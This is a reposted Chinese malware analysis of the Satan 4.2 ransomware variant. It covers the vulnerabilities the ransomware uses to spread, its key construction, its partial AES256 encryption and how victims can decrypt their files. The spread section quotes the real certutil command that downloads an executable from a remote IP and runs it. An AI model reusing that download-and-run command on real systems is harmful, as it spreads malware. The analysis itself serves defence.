【转载】原文来自:https://bbs.kafan.cn/thread-2135007-1-1.html

一、概述

近日,腾讯御见威胁情报中心检测到一大批的服务器被入侵,入侵后被植入勒索病毒。经过分析确认,植入的勒索病毒为最新的Satan 4.2勒索病毒。
<ignore_js_op>
御见威胁情报中心长期跟踪撒旦(Satan)勒索病毒的变化,并多次对外发布过撒旦(Satan)勒索病毒的分析文章。本次捕捉到的最新变种4.2版,传播方式跟之前的版本并未有太多的变化,但是加密部分发生了变化,会导致之前版本的解密工具失效。
通过技术分析确认,撒旦(Satan)勒索病毒4.2变种将密钥硬编码在病毒及加密后的文件中,因此被撒旦(Satan)勒索病毒加密的文件可以被解密。腾讯御见威胁中心已紧急更新了解密程序,供被勒索的用户恢复被加密的文件。受害用户只须启动腾讯电脑管家中的“文档守护者”,点击文档解密,即可根据提示修复被撒旦(Satan)勒索病毒加密的文档。
二、 传播分析
新捕捉到的样本,传播部分跟之前变化不大,依然集成了利用各种漏洞(包括永恒之蓝和其他服务器组件的漏洞)来进行攻击传播。攻击示意图如下:
<ignore_js_op>
撒旦(Satan)勒索病毒利用的漏洞工具包括:
l  永恒之蓝
l  JBoss反序列化漏洞(CVE-2017-12149)
l  JBoss默认配置漏洞(CVE-2010-0738)
l  Tomcat任意文件上传漏洞(CVE-2017-12615)
l  Tomcatweb管理后台弱口令爆破
l  WeblogicWLS 组件漏洞(CVE-2017-10271)
具体的扫描和入侵部分分析请参见之前的分析文章《撒旦(Satan)勒索蠕虫最新变种攻击方式解析》。
入侵成功后,会执行命令行下载病毒文件,继续扫描和入侵其他的机器并执行勒索病毒。执行的命令行为:
cmd.exe /c certutil.exe -urlcache -split -fhttp://45.77.175.225/cab/sts.exe c:/dbg.exe&&cmd.exe /c  c:/dbg.exe
三、 勒索病毒加解密分析
本次的变种变化较大的为勒索病毒的加密部分,因此本文着重介绍下最新变种的加密算法部分。
1、 加密密钥的组成变化
Satan 3.1 的加密密钥组成为:[HardWareID]+[STR]+[PUBLIC]
Satan 3.3 的加密密钥组成为:[HardWareID]+[HEX_STR]+[PUBLIC]
而最新的Satan 4.2的加密密钥组成为:[HardWareID]+[PUBLIC]+[HEX_STR]+[STR]
不仅密钥的组成因子变多,且顺序跟之前也发生了改变。
新版的密钥组成:
<ignore_js_op>
其中,[HardWareID]和[PUBLIC]会被随机计算出来,并且会写在被加密的文件尾部。
<ignore_js_op>
而HEX_STR和STR则是硬编码在病毒的加密部分中:
<ignore_js_op>
2、 加密算法的变化
跟旧版撒旦(Satan)勒索病毒一样,最新4.2版的撒旦(Satan)勒索病毒为了加快加密速度,依然会对不同大小和不同文件类型的文件采取不同的加密策略,不同的是加密的方法不再是前二分之一、前五分之一。最新的加密方式如下:
病毒会根据文件的后缀名进行完全加密和不完全加密,当文件后缀名符合规定的后缀名时采取完全加密。相关后缀名如下:
"txt", "sql","zip", "php", "asp", "jsp","cpp", "ini", "aspx", "cs","py", "h", "vbs", "bat","conf", "sh", "inc", "e","c", "pl", "csv", "asm","doc", "docx", "xls", "xlsx","ppt"
当文件的后缀名不符合规定的文件名时,则根据文件大小进行加密:
1) 当文件大小大于100000000字节时,则采取每加密16字节后则随后的4x16字节不加密;
2) 当文件大小小于等于100000000字节时,则采取每加密16字节后随后的16字节不加密。
比如文件大小小于100000000字节的rar文件,被加密后的文件内容情况如下:
<ignore_js_op>
这种加密方式虽然加密的方法和旧版本不同,但是同样做到了加密整体文件的二分之一、五分之一。
而最后采用的加密算法不再是旧版本中使用的RC4加密算法,而是AES256 ECB加密。
<ignore_js_op>
加密后在目录下生成解密提示文本内容如下:
<ignore_js_op>
加密后的文件名变为[sicck@protonmail.com]文件名.sicck:
<ignore_js_op>
至于解密部分,由于AES256是对称加密算法,而密钥组成部分硬编码在病毒文件和加密后的文件中,因此撒旦(Satan)勒索病毒完全可以被解密。解密方法只要从加密后文件的末尾提取HardWareID和PUBLIC,然后在病毒体中提取的HEX_STR和STR,组成AES256的key,即可用来解密加密后的文件。
而腾讯御点和腾讯电脑管家也更新了Satan的解密工具,使用腾讯电脑管家文档守护者中的文档解密功能即可解密成功。
<ignore_js_op>
若有中该勒索病毒的用户和无法使用该工具解密的用户,请联系我们官方人员,协助进行解密。
<ignore_js_op>
四、安全建议
腾讯御见威胁情报中心提醒用户注意以下几点:
1、        服务器关闭不必要的端口,方法可参考: https://guanjia.qq.com/web_clinic/s8/585.html
2、        使用腾讯御点(个人用户可使用腾讯电脑管家)的漏洞修复功能,及时修复系统高危漏洞;
3、        服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解;
4、        推荐企业用户使用腾讯御点(下载地址: https://s.tencent.com/product/yd/index.html),个人用户使用腾讯电脑管家,拦截可能的病毒攻击。
<ignore_js_op>

转载于:https://www.cnblogs.com/0lxp/p/9871830.html

【转载】撒旦(Satan 4.2)勒索病毒最新变种加解密分析相关推荐

  1. 【转载】Globelmposter勒索病毒最新变种预警

    近日,深信服安全团队观察到Globelmposter勒索病毒又出现最新变种,加密后缀有Ares666.Zeus666.Aphrodite666.Apollon666等,目前国内已有多家大型医院率先发现 ...

  2. Mallox勒索病毒最新变种.malox勒索病毒来袭,如何恢复受感染的数据?

    Mallox勒索病毒是一种针对计算机系统的恶意软件,能够加密受感染计算机上的文件.最近,新的Mallox病毒变种.malox勒索病毒被发现并引起了关注,.malox勒索病毒这个后缀已经是Mallox勒 ...

  3. .x3m勒索病毒怎么处理 phobos勒索病毒恢复成功 百分百解密sql文件恢复

    x3m勒索病毒的处理,中了后缀是phobos勒索病毒怎么办? 百分百解密,成功恢复sql被加密文件 如何防范勒索软件***? 备份!备份!备份!使用恢复系统,使勒索软件感染永远不会破坏您的个人数据.最 ...

  4. 计算机服务器中了360后缀勒索病毒,正确的解密恢复数据库的方式有哪些

    随着计算机技术的不断发展,网络安全也引起了人们重视,近期,我们收到很多企业的求助,企业的计算机服务器被360后缀勒索病毒攻击,导致系统内的数据库全部被加密,重要数据无法被读取,严重影响了企业的正常工作 ...

  5. 勒索病毒 最新消息整理

    1.黑客公开勒索病毒代码 (2019-1-29) 1月29日瑞星拦截一款病毒样本 作者"GoRansom". 病毒采用Go语言开发,使用非对称算法加密文件,病毒运行后会加密指定文件 ...

  6. Globelmposter勒索病毒最新“十二主神”预警

    近日,深信服安全团队观察到Globelmposter勒索病毒又出现最新变种,加密后缀有Ares666.Zeus666.Aphrodite666.Apollon666等,目前国内已有多家大型医院率先发现 ...

  7. 2018最新出现的勒索病毒及变种统计丨阿里云河南

    目录 0x01 Relec勒索病毒 0x02 DeadRansomware勒索病毒 0x03 Saturn勒索病毒 0x04 BananaCrypt勒索病毒 0x05 Shifr勒索病毒变种Crypt ...

  8. 删除China Lucky系列病毒 后缀.evopro勒索病毒数据恢复方法,解密处理方式

    China Lucky系列,也称为.evopro后缀勒索病毒将加密您的数据,并要求金钱作为赎金,以恢复它.文件将作为辅助文件接收.evopro扩展名,而不对加密文件的原始名称进行任何更改.该.evop ...

  9. 勒索病毒发生变种 新文件名将带有“.UIWIX”后缀

    5月18日,据国外媒体报道,本周三国家计算机病毒应急处理中心(CVERC)和软件公司亚信科技联合监测发现了与WannaCry勒索病毒类似的UIWIX病毒. uiwix病毒 CVERC常务副主任陈建民表 ...

最新文章

  1. 剑指offer:面试题41. 数据流中的中位数
  2. CPU核数跟多线程的关系
  3. Web开发工具包收藏
  4. 自考18年4月计算机应用基础,2019年自学考试计算机应用基础试题(18)
  5. ThinkPHP V5 漏洞利用
  6. C#运算符重载(操作符重载)
  7. 负载均衡获取客户端IP
  8. python字符串的内建函数_python的字符串内建函数
  9. 【数字信号调制】基于matlab GUI ASK+OOK+BPSK+8PSK+QPSK+AM调制解调【含Matlab源码 1368期】
  10. dos如何运行java_怎么用DOS命令运行java程序
  11. 锁存器怎么使用c语言编程,读引脚、读锁存器与读-改-写指令
  12. CwRsync实现文件同步(windows或linux服务器通用)
  13. 莫名奇妙的异常010:Unexpected server response (0) while retrieving PDF
  14. draggable 总结
  15. CSP-2019day1题解报告
  16. JavaScript随机漂浮碰壁效果
  17. BCSP-玄子前端开发之JavaScript+jQuery入门CH13_表单校验
  18. 120941138报:工信部正搭建移动应用认证和管理服务
  19. The element or ID supplied is not valid. (videojs)
  20. InVEST模型生境质量模型数据处理流程

热门文章

  1. rtklib 天线相位中心_北斗广播TGD精度评估及其对静态定位性能分析
  2. 使用JavaScript实现评论点赞功能
  3. 你真的了解java吗?java总结八
  4. 正在蔓延的人工智能民族主义与国家化趋势
  5. macos high sierra U盘制作
  6. 60句简短的话 句句在理
  7. 通过持续Ping来检测网络质量
  8. 如何打开不知道文件类型的文件
  9. 计算机工程与设计志,计算机工程与设计
  10. 星界边境的服务器信息,怎么用vps开星界边境服务器